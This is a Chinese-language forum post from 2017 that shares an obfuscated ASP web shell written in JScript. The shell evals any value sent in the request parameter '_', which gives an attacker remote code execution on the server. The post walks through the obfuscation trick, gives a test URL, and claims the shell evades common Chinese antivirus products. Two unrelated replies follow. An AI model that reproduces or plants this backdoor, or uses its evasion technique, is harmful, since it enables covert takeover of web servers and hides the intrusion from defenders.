UDN-企业互联网技术人气社区

板块导航

浏览  : 880
回复  : 11

[原生js] ASP一句话也可以奇葩

[复制链接]
htmlman的头像 楼主
发表于 2017-2-10 10:45:12 | 显示全部楼层 |阅读模式

  大家都造PHP千变万化,从变量,数组,赋值,运算,函数等..没有一样不奇葩的!所以常说PHP的木马永远杀不干净

  但是asp就悲剧了,它的脚本VBS用法很死板,不像PHP语法各种灵活和奇葩,不过别忘了asp是可以自定义脚本的

  如果改成JavaScript脚本来执行代码,也能像PHP木马一样奇葩

  下面分享一下偶的一匹悍马
  1. <%@LANGUAGE="JavaScript"%>
  2. <%_()(_(!-''));function _(__){if(__){return Request('_')+''}else{return  eval
  3. }}
  4. %>
复制代码

  代码简单说明:

  第一句,声明脚本为JavaScript

  第二句,自定义了个函数_,当传入为空时返回 eval 函数,当传入为真时返回 _ 接收的值; !-'' 是1(True)的变形 (和PHP变形一样有木有?)

  代码原形:

  eval(Request('_')+'') ,注意 +'' 绝对不能忽略,这是把接来的值转为串,否则不能识别;

  手连测试:
  1. test.asp?_=Response.write%20(Date()); //输出当前时间
复制代码

  总结:

  用JavaScript来写asp,语法就能像php一样各种奇葩,但是注意以下几点:

  1. 虽然能免杀狗,盾和360,还是有关键eval,所以对于靠关键词查杀的简单脚本和工具就报出来了

  2.由于用的javscript脚本,所以用一般的客户端,如菜刀,斧头。。都连不上,有待码农开发个客户端。。。

相关帖子

发表于 2017-2-10 10:46:08 来自手机 | 显示全部楼层
jq现在应该算是最火的js框架类了吧?确实很强大extjs基于Yahoo UI的扩展,界面布局和效果方面很给力,但就是有点复杂
使用道具 举报

回复

发表于 2017-2-10 10:46:09 | 显示全部楼层
经常看到”htmlman“发帖,辛苦了
使用道具 举报

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们
联系我们
  • 电话:010-86393388
  • 邮件:udn@yonyou.com
  • 地址:北京市海淀区北清路68号
移动客户端下载
关注我们
  • 微信公众号:yonyouudn
  • 扫描右侧二维码关注我们
  • 专注企业互联网的技术社区
版权所有:用友网络科技股份有限公司82041 京ICP备05007539号-11 京公网网备安1101080209224 Powered by Discuz!
快速回复 返回列表 返回顶部